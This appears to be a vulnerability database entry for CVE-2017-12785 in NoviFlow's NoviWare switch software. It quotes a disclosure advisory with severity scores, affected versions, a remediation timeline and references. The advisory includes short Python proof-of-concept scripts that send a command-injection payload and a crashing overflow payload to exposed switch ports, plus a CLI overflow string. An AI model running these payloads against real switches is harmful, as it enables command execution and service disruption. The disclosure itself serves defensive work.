Sign-up

ID

VAR-201708-1145


CVE

CVE-2017-12785


TITLE

NoviWare Buffer error vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2017-007313

DESCRIPTION

The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Introduction ========== NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices. CVEs ===== * CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) * CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) * CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Affected versions ============== NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed Author ====== FranASSois Goichon - Google Security Team CVE-2017-12784 ============== Remote code execution in novi_process_manager_daemon Summary ------------- The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. - A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service - This network service is prone to command injection and a stack-based buffer overflow Reproduction ------------------ If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, 2020)) payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" s.sendall(pack("<II", 1, len(payload)+8)) s.sendall(payload) s.close() --- On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Reproduction ------------------ Log in to the appliance via SSH and run the following command from the CLI: -- noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -- If the appliance is vulnerable, the cli crashes and the session ends. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. - A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services - These network services are prone to a stack-based buffer overflow when unpacking serialized values. Reproduction ------------------ If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions : --- from struct import pack import socket s = socket.socket() s.connect((<switch host>, <9090 or 12345>)) payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload s.sendall(payload) s.read(1) s.close() --- A watchdog should restart the service if it has crashed. Remediation ----------------- - Upgrade to NoviWare400 3.0 or later. - NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com. Disclosure timeline =============== 2017/05/11 - Report sent to NoviFlow 2017/05/26 - Bugs acknowledged and remediation timeline confirmed 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities 2017/08/09 - CVE requests 2017/08/16 - Public disclosure

Trust: 1.8

sources: NVD: CVE-2017-12785 // JVNDB: JVNDB-2017-007313 // VULMON: CVE-2017-12785 // PACKETSTORM: 143818

AFFECTED PRODUCTS

vendor:noviflowmodel:noviwarescope:lteversion:400.2.6

Trust: 1.0

vendor:noviflowmodel:noviwarescope:lteversion:nw400.2.6

Trust: 0.8

vendor:noviflowmodel:noviwarescope:eqversion:400.2.6

Trust: 0.6

sources: JVNDB: JVNDB-2017-007313 // CNNVD: CNNVD-201708-459 // NVD: CVE-2017-12785

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-12785
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-12785
value: CRITICAL

Trust: 0.8

CNNVD: CNNVD-201708-459
value: CRITICAL

Trust: 0.6

VULMON: CVE-2017-12785
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-12785
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

nvd@nist.gov: CVE-2017-12785
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: VULMON: CVE-2017-12785 // JVNDB: JVNDB-2017-007313 // CNNVD: CNNVD-201708-459 // NVD: CVE-2017-12785

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.8

sources: JVNDB: JVNDB-2017-007313 // NVD: CVE-2017-12785

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201708-459

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201708-459

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2017-007313

EXPLOIT AVAILABILITY
sources:
            
            
            VULMON: CVE-2017-12785

PATCH
title:NoviWareurl:https://noviflow.com/products/noviware/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2017-007313

EXTERNAL IDS
db:NVDid:CVE-2017-12785
Trust: 2.6
db:EXPLOIT-DBid:42518
Trust: 2.5
db:JVNDBid:JVNDB-2017-007313
Trust: 0.8
db:CNNVDid:CNNVD-201708-459
Trust: 0.6
db:VULMONid:CVE-2017-12785
Trust: 0.1
db:PACKETSTORMid:143818
Trust: 0.1
sources:
            
            
            VULMON: CVE-2017-12785 // 
            
            
            
            JVNDB: JVNDB-2017-007313 // 
            
            
            
            PACKETSTORM: 143818 // 
            
            
            
            CNNVD: CNNVD-201708-459 // 
            
            
            
            NVD: CVE-2017-12785

REFERENCES
url:https://www.exploit-db.com/exploits/42518/
Trust: 2.6
url:https://nvd.nist.gov/vuln/detail/cve-2017-12785
Trust: 0.9
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12785
Trust: 0.8
url:https://cwe.mitre.org/data/definitions/119.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2017-12787
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2017-12786
Trust: 0.1
sources:
            
            
            VULMON: CVE-2017-12785 // 
            
            
            
            JVNDB: JVNDB-2017-007313 // 
            
            
            
            PACKETSTORM: 143818 // 
            
            
            
            CNNVD: CNNVD-201708-459 // 
            
            
            
            NVD: CVE-2017-12785

CREDITS
Francois Goichon
Trust: 0.1
sources:
            
            
            PACKETSTORM: 143818

SOURCES
db:VULMONid:CVE-2017-12785
db:JVNDBid:JVNDB-2017-007313
db:PACKETSTORMid:143818
db:CNNVDid:CNNVD-201708-459
db:NVDid:CVE-2017-12785

LAST UPDATE DATE
2025-04-20T23:04:26.327000+00:00

SOURCES UPDATE DATE
db:VULMONid:CVE-2017-12785date:2017-08-29T00:00:00
db:JVNDBid:JVNDB-2017-007313date:2017-09-19T00:00:00
db:CNNVDid:CNNVD-201708-459date:2017-08-23T00:00:00
db:NVDid:CVE-2017-12785date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE
db:VULMONid:CVE-2017-12785date:2017-08-22T00:00:00
db:JVNDBid:JVNDB-2017-007313date:2017-09-19T00:00:00
db:PACKETSTORMid:143818date:2017-08-18T23:44:44
db:CNNVDid:CNNVD-201708-459date:2017-08-11T00:00:00
db:NVDid:CVE-2017-12785date:2017-08-22T17:29:00.193